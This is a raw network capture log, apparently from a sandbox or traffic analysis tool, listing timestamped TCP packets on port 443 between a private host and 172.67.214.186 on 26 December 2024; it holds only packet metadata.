                                                                                                                                                                              Dec 26, 2024 18:26:46.457055092 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.457113981 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.457119942 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.457146883 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.457173109 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.464399099 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.464440107 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.464482069 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.464487076 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.464514017 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.464540958 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.471540928 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.471563101 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.471606016 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.471611023 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.471640110 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.471673965 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.478852987 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.478878975 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.478921890 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.478925943 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.478955030 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.478981972 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.486896992 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.486917973 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.486974001 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.486979961 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.487030029 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.647058964 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.647085905 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.647156954 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.647162914 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.647197962 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.647217989 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.653294086 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.653315067 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.653362989 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.653367043 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.653409958 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.653436899 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.660640001 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.660660028 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.660705090 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.660710096 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.660729885 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.660754919 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.668240070 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.668267965 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.668322086 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.668327093 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.668376923 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.668416977 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.674731016 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.674751043 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.674817085 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.674823046 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.674870968 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.682631016 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.682658911 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.682701111 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.682706118 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.682733059 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.682754040 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.689215899 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.689237118 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.689284086 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.689292908 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.689311981 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.689338923 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.697788954 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.697809935 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.697869062 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.697874069 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.697920084 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.856604099 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.856626987 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.856712103 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.856719017 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.856729031 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.856762886 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.864005089 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.864027977 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.864104986 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.864109993 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.864166021 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.871534109 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.871550083 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.871614933 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.871619940 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.871682882 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.878025055 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.878043890 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.878092051 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.878098011 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.878127098 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.878148079 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.885529995 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.885545969 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.885628939 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.885633945 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.885695934 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.892534018 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.892563105 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.892612934 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.892621040 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.892651081 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.892683983 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.899894953 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.899919987 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.899996042 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.900002003 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.900047064 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.907926083 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.907954931 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.908021927 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:46.908027887 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:46.908070087 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.371345997 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.371359110 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.371401072 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.371505022 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.371515989 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.371547937 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.371551037 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.371579885 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.371614933 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.372555971 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.372572899 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.372602940 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.372632027 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.372643948 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.372658014 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.372680902 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.372718096 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.373749971 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.373766899 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.373822927 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.373826981 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.373871088 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.374891996 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.374908924 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.374955893 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.374959946 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.374999046 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.375369072 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.375386000 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.375416040 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.375425100 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.375428915 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.375469923 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.375570059 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.377120018 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.377135992 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.377171993 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.377190113 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.377196074 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.377227068 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.377270937 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.377424955 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.377468109 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.378329039 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.378345966 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.378371954 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.378398895 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.378403902 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.378434896 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.378473997 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.379278898 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.379384995 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.379400015 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.379462004 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.379466057 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.379513025 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.380937099 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.380953074 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.381009102 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.381012917 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.381055117 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.381093025 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.381455898 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.381469011 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.381531000 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.381535053 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.381577969 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.382144928 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.382162094 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.382200956 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.382205963 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.382235050 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.382253885 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.383058071 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.383291960 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.383306980 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.383362055 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.383366108 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.383407116 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.387873888 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.391680956 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.491796970 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.491858959 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.491910934 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.491919994 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.491947889 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.491971016 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.499166012 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.499228954 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.499249935 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.499254942 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.499284983 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.499305964 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.505693913 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.505772114 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.505773067 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.505801916 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.505841970 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.505858898 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.513114929 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.513161898 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.513212919 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.513217926 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.513267994 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.520519018 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.520560980 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.520612001 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.520617008 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.520648003 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.520680904 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.527569056 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.527611017 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.527641058 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.527646065 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.527704954 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.534960032 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.535001993 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.535038948 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.535043955 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.535070896 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.535089970 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.542973042 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.543015957 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.543054104 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.543060064 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.543083906 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.543103933 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.701976061 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.702042103 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.702068090 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.702076912 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.702105999 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.702127934 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.709132910 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.709167004 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.709208012 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.709212065 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.709232092 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.709258080 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.716145039 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.716176987 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.716217041 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.716221094 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.716245890 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.716264963 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.722342014 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.722372055 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.722433090 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.722436905 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.722477913 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.729511976 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.729542017 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.729579926 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.729583979 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.729594946 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.729628086 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.736202002 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.736232996 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.736268997 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.736272097 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.736298084 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.736315966 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.743519068 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.743556023 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.743592024 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.743596077 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.743621111 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.743639946 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.753395081 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.753421068 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.753463030 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.753467083 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.753492117 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.753506899 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:47.912807941 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.912870884 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:47.912928104 CET49719443192.168.2.16172.67.214.186
